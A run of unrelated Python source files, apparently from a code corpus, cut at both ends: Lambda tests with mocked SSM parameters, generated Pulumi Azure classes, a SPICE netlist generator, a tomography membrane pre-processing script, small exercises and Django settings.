Type='SecureString', Value='https://httpstat.us/200', KeyId='alias/aws/ssm') # run lambda function response = lambda_function.handle_state(SUMO_SSM_NAME, MESSAGE) # test response assert response.get("status") == "success" @mock_ssm def test_handle_state_invalid_message(): #setup param for lambda function client = boto3.client('ssm') client.put_parameter(Name=SUMO_SSM_NAME, Type='SecureString', Value='https://httpstat.us/200', KeyId='alias/aws/ssm') # run lambda function with pytest.raises(TypeError): response = lambda_function.handle_state(SUMO_SSM_NAME, ['not', 'a', 'string']) @mock_ssm def test_handle_state_failed_post(): #setup failed POST param for lambda function client = boto3.client('ssm') client.put_parameter(Name=SUMO_SSM_NAME, Type='SecureString', Value='https://httpstat.us/403', KeyId='alias/aws/ssm') # run lambda function with pytest.raises(exceptions.ConnectionError): response = lambda_function.handle_state(SUMO_SSM_NAME, MESSAGE) pulumi-bot/pulumi-azure-native10-100 # coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ... import _utilities, _tables from ._enums import * __all__ = [ 'ManagedServiceIdentityArgs', ] @pulumi.input_type class ManagedServiceIdentityArgs: def __init__(__self__, *, tenant_id: Optional[pulumi.Input[str]] = None, type: Optional[pulumi.Input[Union[str, 'ManagedServiceIdentityType']]] = None, user_assigned_identities: Optional[pulumi.Input[Mapping[str, Any]]] = None): """ Managed identity generic object. :param pulumi.Input[str] tenant_id: ID of the Azure Active Directory. :param pulumi.Input[Union[str, 'ManagedServiceIdentityType']] type: Type of the managed identity. :param pulumi.Input[Mapping[str, Any]] user_assigned_identities: The list of user-assigned managed identities associated with the resource. Key is the Azure resource Id of the managed identity. """ if tenant_id is not None: pulumi.set(__self__, "tenant_id", tenant_id) if type is not None: pulumi.set(__self__, "type", type) if user_assigned_identities is not None: pulumi.set(__self__, "user_assigned_identities", user_assigned_identities) @property @pulumi.getter(name="tenantId") def tenant_id(self) -> Optional[pulumi.Input[str]]: """ ID of the Azure Active Directory. """ return pulumi.get(self, "tenant_id") @tenant_id.setter def tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_id", value) @property @pulumi.getter def type(self) -> Optional[pulumi.Input[Union[str, 'ManagedServiceIdentityType']]]: """ Type of the managed identity. """ return pulumi.get(self, "type") @type.setter def type(self, value: Optional[pulumi.Input[Union[str, 'ManagedServiceIdentityType']]]): pulumi.set(self, "type", value) @property @pulumi.getter(name="userAssignedIdentities") def user_assigned_identities(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ The list of user-assigned managed identities associated with the resource. Key is the Azure resource Id of the managed identity. """ return pulumi.get(self, "user_assigned_identities") @user_assigned_identities.setter def user_assigned_identities(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "user_assigned_identities", value) from django.conf.urls import patterns, url from twitch import views urlpatterns = patterns('', url(r'^live_streams$', views.available_streams, name='live_streams'), ) #!/usr/bin/env python # -*-coding:utf-8 -*- '''Generate electrical netlist.cir file for SPICE simulation TODO : create a class for device with add_instance and update methods ''' import io # To use TextIOWrapper text stream import datetime # To get current date and time # Constants _END_OF_LINE = '\n' _ZFILL_WIDTH = 5 class NetList: """Electrical netlist class containing subcircuits and devices Parameters ---------- filepath : str Complete file path where netlist is saved Attributes ---------- filepath : str Complete file path where netlist is saved subcircuits : list of SubCircuit Subcircuits present in NetList devices : list Devices present in NetList __count_device_dict : dict Count of specific devices in NetList __count_device_total : int Total count of all devices in NetList """ def __init__(self, filepath=''): """Constructor for NetList class Parameters ---------- filepath : str, optional Complete file path where netlist is saved, by default '' """ self.filepath = filepath self.subcircuits = [] self.devices = [] self.__count_device_dict = { 'R': 0, 'C': 0, 'L': 0 } self.__count_device_total = int(0) @property def count_device_dict(self): return self.__count_device_dict @property def count_device_total(self): return self.__count_device_total def get_subcircuit_names(self): return [subcircuit.name for subcircuit in self.subcircuits] def add_subcircuit(self, subcircuit): """Add a subcircuit to NetList and initialize subcircuit counter to 0 Parameters ---------- subcircuit : SubCircuit subcircuit is a netlist in a netlist which might be instantiate as a specific device like R, L, C Raises ------ TypeError if subcircuit is not a SubCircuit """ if isinstance(subcircuit, SubCircuit): self.subcircuits.append(subcircuit) self.__count_device_dict[subcircuit.name] = 0 else: raise TypeError('subcircuit must be a SubCircuit') def rlc_instance(self, device: str, nodes: list, value: float): """Create new RLC device instance in NetList with specific nodes. Parameters ---------- device : str Name of the device to insert, must be R, L or C R = Resistance, value in Ohm L = Inductance, value in Henry C = Capacitance, value in Farad nodes : list nodes of the RLC instance value : float value of the RLC instance Raises ------ ValueError if device is not an RLC component """ if device in ['R', 'L', 'C']: self.__count_device_total += 1 # Increment total counter self.__count_device_dict[device] += 1 # Increment rlc counter new_line = ('%s%d %s %.6e%s') % ( device, self.__count_device_dict[device], ' '.join(nodes), value, _END_OF_LINE ) self.devices.append(new_line) else: raise ValueError("device must be in ['R', 'L', 'C']") def subcircuit_instance(self, subcircuit, nodes: list): """Create new subcircuit instance in NetList with specific nodes. Parameters ---------- subcircuit : SubCircuit nodes : list nodes of the subcircuit instance Raises ------ ValueError if subcircuit is not available in the netlist TypeError if subcircuit is not a SubCircuit """ # FIXME: fix isinstance check to match SubCircuit # if isinstance(subcircuit, SubCircuit): if subcircuit.name in self.get_subcircuit_names(): # Increment total and specific device counter self.__count_device_total += 1 self.__count_device_dict[subcircuit.name] += 1 __subcircuit_number = str( self.__count_device_dict[subcircuit.name]).zfill( _ZFILL_WIDTH ) new_line = ('X_%s_%s %s %s%s') % ( subcircuit.suffix, __subcircuit_number, ' '.join(nodes), subcircuit.name, _END_OF_LINE ) self.devices.append(new_line) else: raise ValueError( ('%s does not exist as a subcircuit') % (subcircuit.name) ) print( 'Tips : use add_subcircuit method to add a new subcircuit in the netlist.\n') # else: # raise TypeError('subcircuit must be a SubCircuit') def _write_comment(self, f: io.TextIOWrapper, comment: str = ''): """Write comment in a file using text stream f Parameters ---------- f : io.TextIOWrapper text stream where comment is written comment : str, optional comment to write in the file, by default '' Raises ------ TypeError if f is not an io.TextIOWrapper """ if len(comment): if isinstance(f, io.TextIOWrapper): comment_line = ('*** %s%s') % (comment, _END_OF_LINE) f.write(comment_line) else: raise TypeError('f must be an io.TextIOWrapper') def _write_header(self): """Write netlist file header with few comments in netlist file """ with open(self.filepath, 'w') as f: self._write_comment(f, 'Generated for: SPICE') self._write_comment(f, 'By: simulation.spice python package') # Get current date and time __date_today = datetime.date.today().strftime("%d/%m/%Y") __time_now = datetime.datetime.now().strftime("%H:%M:%S") # Write current date and time self._write_comment(f, ('On: %s') % (__date_today)) self._write_comment(f, ('At: %s') % (__time_now)) self._write_comment(f, ' ') def _write_subcircuits(self): """Write subcircuits in netlist file """ try: with open(self.filepath, 'a+') as f: print('subcircuits below will be written in the netlist :') print(self.get_subcircuit_names()) self._write_comment(f, 'subcircuits') for subcircuit in self.subcircuits: subcircuit._write_subcircuit(f) finally: print('subcircuits from netlist successfully written.\n') def _write_instances(self): """Write instances in netlist file """ try: with open(self.filepath, 'a+') as f: comment = 'Instances' self._write_comment(f, comment) for device in self.devices: f.write(device) finally: print('Instances from netlist successfully written.\n') def write_in_fpath(self): """Write header, subcircuits and instances in netlist file """ self._write_header() self._write_subcircuits() self._write_instances() class SubCircuit(NetList): """Child class inherited from NetList representing a subcircuit Parameters ---------- NetList : NetList netlist containing subcircuits and devices Attributes ---------- name : str, optional name of the subcircuit, by default '' external_nodes : list, optional external nodes of the subcircuit to connect with other devices, by default [] suffix : str, optional suffix to use while instantiating the subcircuit, by default '' """ def __init__(self, name: str = '', external_nodes=[], suffix: str = '', comment: str = ''): """Constructor of SubCircuit class Initiate subcircuit using super class constructor and parameters. Parameters ---------- name : str, optional name of the subcircuit, by default '' external_nodes : list, optional external nodes of the subcircuit to connect with other devices, by default [] suffix : str, optional suffix to use while instantiating the subcircuit, by default '' comment : str, optional comment about the subcircuit will be written in netlist, by default '' """ super().__init__() self.name = name self.ext_nodes = external_nodes self.suffix = suffix self.comment = comment self._update_start_line() self._update_end_line() def _update_start_line(self): """Update starting line in SPICE format based on subcircuit attributes """ self.start_line = ('.SUBCIRCUIT %s %s%s') % ( self.name, ' '.join(self.ext_nodes), _END_OF_LINE) def _update_end_line(self): """Update ending line in SPICE format based on subcircuit attributes """ self.end_line = ('.ENDS %s%s') % (self.name, _END_OF_LINE) def load_from_file( self, subcircuit_filepath, external_nodes: list = [], name: str = '', suffix: str = ''): """ Load subcircuit from subcircuit_filepath .cir file Parameters ---------- subcircuit_filepath : str subcircuit filepath to load from external_nodes : list, optional external nodes of the subcircuit, by default [] name : str, optional name of the sub circuit, by default '' suffix : str, optional suffix to use while instantiating the subcircuit """ # Update SubCircuit attributes based on parameters self.subcircuit_filepath = subcircuit_filepath self.ext_nodes = external_nodes self.name = name self.suffix = suffix # Read the file and updates subcircuit accordingly with open(subcircuit_filepath, 'r') as f: # Read first line line = f.readline() split_line = line.split() k = 0 # If name is empty, update name, starting and ending line based on first line of the file if not name: self.name = split_line[1] self._update_start_line() self._update_end_line() # If ext_nodes is empty update it based on first line of the file if not self.ext_nodes: self.ext_nodes = split_line[2:] print(('subcircuit %s will be loaded from file to the netlist.') % (self.name)) # Retrieve information line by line and update instances while line: k += 1 line = f.readline() split_line = line.split() first_char = split_line[0][0] # Check first character to identify device if first_char in ['R', 'L', 'C']: value = float(split_line[-1]) self.rlc_instance(first_char, split_line[1:-1], value) elif first_char == 'X': self.subcircuit_instance(split_line[-1], split_line[1:-1]) elif first_char in ['.']: if split_line[0] == '.ENDS': print('New subcircuit .\n') break else: print(('Line %d : Unidentified component.') % (k)) def _write_subcircuit(self, f: io.TextIOWrapper): """Write subcircuit and nested subcircuit using text stream f Parameters ---------- f : io.TextIOWrapper text stream where subcircuit is written Raises ------ ValueError if text stream f is closed TypeError if f is not an """ if isinstance(f, io.TextIOWrapper): if f.closed: raise ValueError('Write operation on closed file.') else: self._update_start_line() self._update_end_line() lines = ''.join(self.devices) # Write subcircuit in file using text stream f self._write_comment(f, self.comment) f.write(self.start_line) f.write(lines) # Write subcircuits nested in subcircuit for subcircuit in self.subcircuits: self._write_comment(f, ' ') self._write_comment(f, 'Inner subcircuit') if hasattr(subcircuit, 'subcircuit_filepath'): self._write_comment( f, ('subcircuit loaded from : %s') % (subcircuit.subcircuit_filepath) ) subcircuit._write_subcircuit(f) f.write(self.end_line) else: raise TypeError('f must be an io.TextIOWrapper') kasaya/workers/transactiond/transaction.py class Transaction(object): def __init__(self, operations=None): self.operations = [] self.reverse_operations = [] if operations: for op in operations: self.add_operation(op[0], op[1]) def add_operation(self, operation, reverse): self.operations.append({ 'method': operation, 'status': None }) self.reverse_operations.append({ 'method': reverse, 'status': None }) def get_reverse_operation(self, i): return self.reverse_operations[i]['method'] def get_operation(self, i): return self.operations[i]['method'] def get_operations_count(self): return len(self.operations) 10-100 """ Pre-processing for mb_graph_batch.py of oriented membranes from TomoSegMemTV output Input: - STAR file with 3 columns: + _rlnMicrographName: tomogram original + _rlnImageName: TomoSegMemTV density map output + _psSegLabel: (optional) label for membrane segmentation + _psSegImage: (optional) binary mask to focus the segmentation analysis + _mtMtubesCsv: (optional) a .csv file with microtubule center lines - Setting for segmenting the membranes from TomoSegMemTV density map: + Density threshold: (optional) required if _psSegLabel not defined + Size threshold: (optional) required if _psSegLabel not defined - Sub-volume splitting settings Output: - A STAR file with 3 columns: + _rlnMicrographName: tomogram original + _rlnImageName: sub-volumes + _psSegImage: Un-oriented membrane segmentations for each subvolume + Columns for localizing the sub-volumes within each original tomogram """ ################# Package import import argparse import gc import os import sys import math import time import pyseg as ps import scipy as sp import skimage as sk import numpy as np from pyseg.globals import signed_distance_2d ###### Global variables __author__ = '' MB_LBL, MB_NEIGH = 1, 2 MB_NEIGH_INT, MB_NEIGH_EXT = 2, 3 ######################################################################################## # PARAMETERS ######################################################################################## ROOT_PATH = '/fs/pool/pool-ruben/antonio/shiwei' # Input STAR file in_star = ROOT_PATH + '/pre/in/mb_seg_single_oriented.star' # Output directory out_dir = ROOT_PATH + '/pre/mbo_nosplit' # Subvolume splitting settings sp_split = None # (2, 2, 1) sp_off_voxels = 30 # vox # Membrane segmentation sg_res = 0.52 # nm/voxel sg_th = None # 8 sg_sz = None # 3e3 sg_mb_thick = 4 # nm sg_mb_neigh = 15 # nm # CSV file pre-processing cv_coords_cools = (1, 2, 3) cv_id_col = 4 # Microtubule settings mt_rad = 30 # nm mt_swap_xy = False ######################################################################################## # MAIN ROUTINE ######################################################################################## # Get them from the command line if they were passed through it parser = argparse.ArgumentParser() parser.add_argument('--inStar', default=in_star, help='Input star file.') parser.add_argument('--outDir', default=out_dir, help='Output directory.') parser.add_argument('--spSplit', nargs='+', type=int, default=sp_split, help='Number of splits (X, Y, Z).') parser.add_argument('--spOffVoxels', type=int, default=sp_off_voxels, help='Offset voxels.') parser.add_argument('--sgVoxelSize', default=sg_res, type=float, help='Voxel size (nm/voxel).') parser.add_argument('--sgThreshold', type=int, default=sg_th, help='Density threshold.') parser.add_argument('--sgSizeThreshold', type=int, default=sg_sz, help='Size threshold (voxels).') parser.add_argument('--sgMembThk', default=sg_mb_thick, type=float, help='Segmented membrane thickness (nm)') parser.add_argument('--sgMembNeigh', default=sg_mb_neigh, type=float, help='Segmented membrane neighbours (nm)') args = parser.parse_args() in_star = args.inStar out_dir = args.outDir sp_split = None if args.spSplit == [-1] else args.spSplit sp_off_voxels = args.spOffVoxels sg_res = args.sgVoxelSize sg_th = None if args.sgThreshold == -1 else args.sgThreshold sg_sz = None if args.sgSizeThreshold == -1 else args.sgSizeThreshold sg_mb_thick = args.sgMembThk sg_mb_neigh = args.sgMembNeigh ########## Print initial message print('Pre-processing for SEG analysis of un-oriented membranes from TomoSegMemTV output.') print('\tAuthor: ' + __author__) print('\tDate: ' + time.strftime("%c") + '\n') print('Options:') print('\tOutput directory: ' + str(out_dir)) print('\tInput STAR file: ' + str(in_star)) print('\tData resolution: ' + str(sg_res) + ' nm/vx') if sg_th is not None: print('\tSegmentation settings: ') print('\t\t-Density threshold: ' + str(sg_th)) print('\t\t-Size threshold: ' + str(sg_sz) + ' vx') print('\tSub-volume splitting settings: ') print('\t\t-Number of splits (X, Y, Z): ' + str(sp_split)) print('\t\t-Offset voxels: ' + str(sp_off_voxels)) print('\tMicrotubule settings:') print('\t\t-Microtube luminal radius: ' + str(mt_rad) + ' nm') print('\tCSV pre-processing: ') print('\t\t-Columns for samples coordinates (X, Y, Z): ' + str(cv_coords_cools)) print('\t\t-Column for microtubule ID: ' + str(cv_id_col)) print('') ######### Process print('Parsing input parameters...') sp_res, mt_rad, sp_off_voxels = float(sg_res), float(mt_rad), int(sp_off_voxels) out_stem = os.path.splitext(os.path.split(in_star)[1])[0] conn_mask = np.ones(shape=(3,3,3)) out_seg_dir = out_dir + '/segs' if not os.path.isdir(out_seg_dir): os.makedirs(out_seg_dir) print('Loading input STAR file...') gl_star = ps.sub.Star() try: gl_star.load(in_star) except ps.pexceptions.PySegInputError as e: print('ERROR: input STAR file could not be loaded because of "' + e.get_message() + '"') print('Terminated. (' + time.strftime("%c") + ')') sys.exit(-1) star = ps.sub.Star() star.add_column(key='_rlnMicrographName') star.add_column(key='_rlnImageName') star.add_column(key='_psSegImage') star.add_column(key='_psSegRot') star.add_column(key='_psSegTilt') star.add_column(key='_psSegPsi') star.add_column(key='_psSegOffX') star.add_column(key='_psSegOffY') star.add_column(key='_psSegOffZ') mode_oriented = False if gl_star.has_column('_rlnOriginX') and gl_star.has_column('_rlnOriginY') and gl_star.has_column('_rlnOriginZ'): print('\t-Segmentation origin found, oriented membrane segmentation activated!') mode_oriented = True print('Main Routine: tomograms loop') tomo_id = 0 for row in range(gl_star.get_nrows()): in_ref = gl_star.get_element('_rlnMicrographName', row) print('\tProcessing tomogram: ' + in_ref) out_ref_stem = os.path.splitext(os.path.split(in_ref)[1])[0] in_mb = gl_star.get_element('_rlnImageName', row) print('\t\t-Loading membrane segmentation: ' + in_mb) tomo_mb = ps.disperse_io.load_tomo(in_mb) tomo_ref = ps.disperse_io.load_tomo(in_ref, mmap=True) off_mask_min_x, off_mask_max_x = 0, tomo_ref.shape[0] off_mask_min_y, off_mask_max_y = 0, tomo_ref.shape[1] off_mask_min_z, off_mask_max_z = 0, tomo_ref.shape[2] wide_x = off_mask_max_x - off_mask_min_x wide_y = off_mask_max_y - off_mask_min_y wide_z = off_mask_max_z - off_mask_min_z mt_mask = None if gl_star.has_column('_mtMtubesCsv'): in_csv = gl_star.get_element('_mtMtubesCsv', row) print('\tReading input CSV file: ' + in_csv) mt_dic = ps.globals.read_csv_mts(in_csv, cv_coords_cools, cv_id_col, swap_xy=mt_swap_xy) mts_points = list() for mt_id, mt_samps in zip(iter(mt_dic.keys()), iter(mt_dic.values())): mts_points += mt_samps mts_points = np.asarray(mts_points, dtype=np.float32) * (1./sg_res) print('\tSegmenting the microtubules...') mt_mask = ps.globals.points_to_mask(mts_points, tomo_mb.shape, inv=True) mt_mask = sp.ndimage.morphology.distance_transform_edt(mt_mask, sampling=sg_res, return_indices=False) mt_mask = mt_mask > mt_rad mb_lbl = 0 if sg_th is None: if gl_star.has_column('_psSegLabel'): mb_lbl = gl_star.get_element('_psSegLabel', row) print('\t\t\t+Segmenting membranes with label: ' + str(mb_lbl)) if mb_lbl > 0: tomo_mb = tomo_mb == mb_lbl else: tomo_mb = tomo_mb > 0 else: tomo_mb = tomo_mb > 0 else: tomo_mb = tomo_mb >= sg_th if gl_star.has_column('_mtMtubesCsv'): tomo_mb *= mt_mask del mt_mask if gl_star.has_column('_psSegImage'): print('\tApplying the mask...') hold_mask = ps.disperse_io.load_tomo(gl_star.get_element('_psSegImage', row)) if mb_lbl > 0: hold_mask = hold_mask == mb_lbl else: hold_mask = hold_mask > 0 tomo_mb *= hold_mask ids_mask = np.where(hold_mask) off_mask_min_x, off_mask_max_x = ids_mask[0].min()-sp_off_voxels, ids_mask[0].max()+sp_off_voxels if off_mask_min_x < 0: off_mask_min_x = 0 if off_mask_max_x > hold_mask.shape[0]: off_mask_max_x = hold_mask.shape[0] off_mask_min_y, off_mask_max_y = ids_mask[1].min()-sp_off_voxels, ids_mask[1].max()+sp_off_voxels if off_mask_min_y < 0: off_mask_min_y = 0 if off_mask_max_y > hold_mask.shape[1]: off_mask_max_y = hold_mask.shape[1] off_mask_min_z, off_mask_max_z = ids_mask[2].min()-sp_off_voxels, ids_mask[2].max()+sp_off_voxels if off_mask_min_z < 0: off_mask_min_z = 0 if off_mask_max_z > hold_mask.shape[2]: off_mask_max_z = hold_mask.shape[2] del hold_mask del ids_mask # ps.disperse_io.save_numpy(tomo_mb, out_dir + '/hold.mrc') if sg_th is not None: print('\tMembrane thresholding...') tomo_sz = ps.globals.global_analysis(tomo_mb, 0.5, c=26) tomo_mb = tomo_sz > sg_sz del tomo_sz seg_center = None if mode_oriented: seg_center = np.asarray((gl_star.get_element('_rlnOriginX', row), gl_star.get_element('_rlnOriginY', row), gl_star.get_element('_rlnOriginZ', row))) seg_center[0] -= off_mask_min_x seg_center[1] -= off_mask_min_y seg_center[2] -= off_mask_min_z print('\tSegmenting the membranes...') if sp_split is None: svol_mb = tomo_mb[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z] svol = tomo_ref[off_mask_min_x:off_mask_max_x, off_mask_min_y:off_mask_max_y, off_mask_min_z:off_mask_max_z] svol_dst = sp.ndimage.morphology.distance_transform_edt(np.invert(svol_mb), sampling=sg_res, return_indices=False) svol_seg = np.zeros(shape=svol.shape, dtype=np.float32) if not mode_oriented: svol_seg[svol_dst < sg_mb_neigh + sg_mb_thick] = MB_NEIGH svol_seg[svol_dst < sg_mb_thick] = MB_LBL else: svol_dst = signed_distance_2d(svol_mb, res=1, del_b=True, mode_2d=True, set_point=seg_center) svol_seg[(svol_dst > 0) & (svol_dst < sg_mb_neigh + sg_mb_thick)] = MB_NEIGH_INT svol_seg[(svol_dst < 0) & (svol_dst > -1. * (sg_mb_neigh + sg_mb_thick))] = MB_NEIGH_EXT svol_seg[np.absolute(svol_dst) < sg_mb_thick] = MB_LBL svol_seg[svol_dst == 0] = 0 svol_seg[svol_mb > 0] = MB_LBL out_svol = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '.mrc' out_seg = out_seg_dir + '/' + out_ref_stem + '_tid_' + str(tomo_id) + '_seg.mrc' ps.disperse_io.save_numpy(svol, out_svol) ps.disperse_io.save_numpy(svol_seg, out_seg) del svol_seg del svol_dst row_dic = dict() row_dic['_rlnMicrographName'] = in_ref row_dic['_rlnImageName'] = out_svol row_dic['_psSegImage'] = out_seg row_dic['_psSegRot'] = 0 row_dic['_psSegTilt'] = 0 row_dic['_psSegPsi'] = 0 row_dic['_psSegOffX'] = off_mask_min_x # 0 row_dic['_psSegOffY'] = off_mask_min_y # 0 row_dic['_psSegOffZ'] = off_mask_min_z star.add_row(**row_dic) else: print('\tSplitting into subvolumes:') if sp_split[0] > 1: hold_wide = int(math.ceil(wide_x / sp_split[0])) hold_pad = int(math.ceil((off_mask_max_x - off_mask_min_x) / sp_split[0])) hold_split = int(sp_split[0] * math.ceil(float(hold_pad)/hold_wide)) offs_x = list() pad_x = off_mask_min_x + int(math.ceil((off_mask_max_x-off_mask_min_x) / hold_split)) offs_x.append((off_mask_min_x, pad_x+sp_off_voxels)) lock = False while not lock: hold = offs_x[-1][1] + pad_x if hold >= off_mask_max_x: offs_x.append((offs_x[-1][1] - sp_off_voxels, off_mask_max_x)) lock = True else: offs_x.append((offs_x[-1][1]-sp_off_voxels, offs_x[-1][1]+pad_x+sp_off_voxels)) else: offs_x = [(off_mask_min_x, off_mask_max_x),] if sp_split[1] > 1: hold_wide = int(math.ceil(wide_y / sp_split[1])) hold_pad = int(math.ceil((off_mask_max_y - off_mask_min_y) / sp_split[1])) hold_split = int(sp_split[1] * math.ceil(float(hold_pad) / hold_wide)) offs_y = list() pad_y = off_mask_min_y + int(math.ceil((off_mask_max_y-off_mask_min_y) / hold_split)) offs_y.append((off_mask_min_x, pad_y + sp_off_voxels)) lock = False while not lock: hold = offs_y[-1][1] + pad_y if hold >= off_mask_max_y: offs_y.append((offs_y[-1][1] - sp_off_voxels, off_mask_max_y)) lock = True else: offs_y.append((offs_y[-1][1] - sp_off_voxels, offs_y[-1][1] + pad_y + sp_off_voxels)) else: offs_y = [(off_mask_min_x, off_mask_max_x),] if sp_split[2] > 1: hold_wide = int(math.ceil(wide_z / sp_split[2])) hold_pad = int(math.ceil((off_mask_max_z - off_mask_min_z) / sp_split[2])) hold_split = int(sp_split[2] * math.ceil(float(hold_pad) / hold_wide)) offs_z = list() pad_z = off_mask_min_z + int(math.ceil((off_mask_max_z-off_mask_min_z) / hold_split)) offs_z.append((off_mask_min_z, pad_z + sp_off_voxels)) lock = False while not lock: hold = offs_z[-1][1] + pad_z if hold >= off_mask_max_z: offs_z.append((offs_z[-1][1] - sp_off_voxels, off_mask_max_z)) lock = True else: offs_z.append((offs_z[-1][1] - sp_off_voxels, offs_z[-1][1] + pad_z + sp_off_voxels)) else: offs_z = [(off_mask_min_z, off_mask_max_z),] split_id = 1 for off_x in offs_x: for off_y in offs_y: for off_z in offs_z: print('\t\t-Splitting subvolume: [' + str(off_x) + ', ' + str(off_y) + ', ' + str(off_z) +']') svol_mb = tomo_mb[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]] svol = tomo_ref[off_x[0]:off_x[1], off_y[0]:off_y[1], off_z[0]:off_z[1]] svol_seg = np.zeros(shape=svol.shape, dtype=np.float32) if not mode_oriented: svol_dst = sp.ndimage.morphology.distance_transform_edt(np.invert(svol_mb), sampling=sg_res, return_indices=False) svol_seg[svol_dst < sg_mb_neigh + sg_mb_thick] = MB_NEIGH svol_seg[svol_dst < sg_mb_thick] = MB_LBL else: seg_off_center = seg_center - np.asarray((off_x[0], off_y[0], off_z[0])) svol_dst = signed_distance_2d(svol_mb, res=1, del_b=True, mode_2d=True, set_point=seg_off_center) svol_seg[(svol_dst > 0) & (svol_dst < sg_mb_neigh + sg_mb_thick)] = MB_NEIGH_INT svol_seg[(svol_dst < 0) & (svol_dst > -1. * (sg_mb_neigh + sg_mb_thick))] = MB_NEIGH_EXT svol_seg[np.absolute(svol_dst) < sg_mb_thick] = MB_LBL svol_seg[svol_dst == 0] = 0 svol_seg[svol_mb > 0] = MB_LBL out_svol = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '.mrc' out_seg = out_seg_dir + '/' + out_ref_stem + '_id_' + str(tomo_id) + '_split_' + str(split_id) + '_mb.mrc' ps.disperse_io.save_numpy(svol, out_svol) ps.disperse_io.save_numpy(svol_seg, out_seg) del svol_seg del svol_dst split_id += 1 row_dic = dict() row_dic['_rlnMicrographName'] = in_ref row_dic['_rlnImageName'] = out_svol row_dic['_psSegImage'] = out_seg row_dic['_psSegRot'] = 0 row_dic['_psSegTilt'] = 0 row_dic['_psSegPsi'] = 0 row_dic['_psSegOffX'] = off_x[0] row_dic['_psSegOffY'] = off_y[0] row_dic['_psSegOffZ'] = off_z[0] star.add_row(**row_dic) # Prepare next iteration gc.collect() tomo_id += 1 out_star = out_dir + '/' + out_stem + '_pre.star' print('\tStoring output STAR file in: ' + out_star) star.store(out_star) print('Terminated. (' + time.strftime("%c") + ')')kkcookies99/UASTDataset/Leetcode/train/1/235.py0 class Solution: def XXX(self, nums: List[int], target: int) -> List[int]: hash_map = {} for i in range(len(nums)): if nums[i] in hash_map: return [hash_map[nums[i]], i] hash_map.setdefault(target-nums[i], i) WilliamSampaio/ExerciciosPython import os np1 = float(input('digite NP1: ')) while np1 < 0 or np1 > 10: print('NP1 inválida!') np1 = float(input('digite NP1: ')) np2 = float(input('digite NP2: ')) while (np2 < 0 or np2 > 10): print('NP2 inválida!') np2 = float(input('digite NP2: ')) media = (np1 + np2) / 2 if media == 10: print(f'MÉDIA: {media} (APROVADO COM DISTINÇÃO)') elif media >= 7: print(f'MÉDIA: {media} (APROVADO)') else: print(f'MÉDIA: {media} (REPROVADO)') os.system("pause") '''Group''' from functools import cmp_to_key from zDogPy.anchor import Anchor, shapeSorter class Group(Anchor): updateSort = False visible = True # ------ # update # ------ def updateSortValue(self): sortValueTotal = 0 self.checkFlatGraph() for item in self.flatGraph: item.updateSortValue() sortValueTotal += item.sortValue # average sort value of all points # def not geometrically correct, but works for me self.sortValue = sortValueTotal / len(self.flatGraph) if self.updateSort: self.flatGraph.sort(key=cmp_to_key(shapeSorter)) # ------ # render # ------ def render(self, ctx, renderer): if not self.visible: return self.checkFlatGraph() for item in self.flatGraph: item.render(ctx, renderer) def getFlatGraph(self): # do not include children, group handles rendering & sorting internally return [self] def updateFlatGraph(self): # get flat graph only used for group # do not include in parent flatGraphs # do not include self flatGraph = [] for child in self.children: childFlatGraph = child.getFlatGraph() flatGraph += childFlatGraph self.flatGraph = flatGraph """ Django settings for openhumansimputer project. Generated by 'django-admin startproject' using Django 2.0.2. For more information on this file, see https://docs.djangoproject.com/en/2.0/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.0/ref/settings/ """ import os import dj_database_url from env_tools import apply_env import logging import sentry_sdk from sentry_sdk.integrations.django import DjangoIntegration from sentry_sdk.integrations.celery import CeleryIntegration logger = logging.getLogger(__name__) apply_env() # Build paths inside the project like this: os.path.join(BASE_DIR, ...) PROJECT_ROOT = os.path.dirname(os.path.abspath(__file__)) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Directory for helpers and data BASE_DATA_DIR = os.getenv('BASE_DATA_DIR') # Directory where we log to LOG_DIR = os.getenv('LOGDIR') # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = os.getenv('SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = False if os.getenv('DEBUG', '').lower() == 'false' else True print('DEBUG: {}'.format(DEBUG)) REMOTE = True if os.getenv('REMOTE', '').lower() == 'true' else False print('REMOTE: {}'.format(REMOTE)) #ALLOWED_HOSTS = ['*'] ALLOWED_HOSTS = ['.openimpute.com', '192.168.3.11'] REMOTE_APP_NAME = os.getenv('REMOTE_APP_NAME', '') DEFAULT_BASE_URL = ('http://{}'.format(REMOTE_APP_NAME) if REMOTE else 'http://127.0.0.1:5000') #HEROKUCONFIG_APP_NAME = 'http://172.16.58.3' #DEFAULT_BASE_URL = 'http://172.16.58.3:8000' OPENHUMANS_APP_BASE_URL = os.getenv('APP_BASE_URL', DEFAULT_BASE_URL) if OPENHUMANS_APP_BASE_URL[-1] == "/": OPENHUMANS_APP_BASE_URL = OPENHUMANS_APP_BASE_URL[:-1] OPENHUMANS_APP_REDIRECT_URI = OPENHUMANS_APP_BASE_URL + '/complete' # Open Humans configuration OPENHUMANS_CLIENT_ID = os.getenv('OH_CLIENT_ID') OPENHUMANS_CLIENT_SECRET = os.getenv('OH_CLIENT_SECRET') OH_ACTIVITY_PAGE = os.getenv('OH_ACTIVITY_PAGE') OPENHUMANS_OH_BASE_URL = 'https://www.openhumans.org' OH_API_BASE = OPENHUMANS_OH_BASE_URL + '/api/direct-sharing' OH_DIRECT_UPLOAD = OH_API_BASE + '/project/files/upload/direct/' OH_DIRECT_UPLOAD_COMPLETE = OH_API_BASE + '/project/files/upload/complete/' OH_DELETE_FILES = OH_API_BASE + '/project/files/delete/' # Imputer Settings # in production this should be False TEST_CHROMS = True if os.environ.get( 'TEST_CHROMS', '').lower() == 'true' else False if TEST_CHROMS: print('using chr21 and chr22 for testing') CHROMOSOMES = ["{}".format(i) for i in 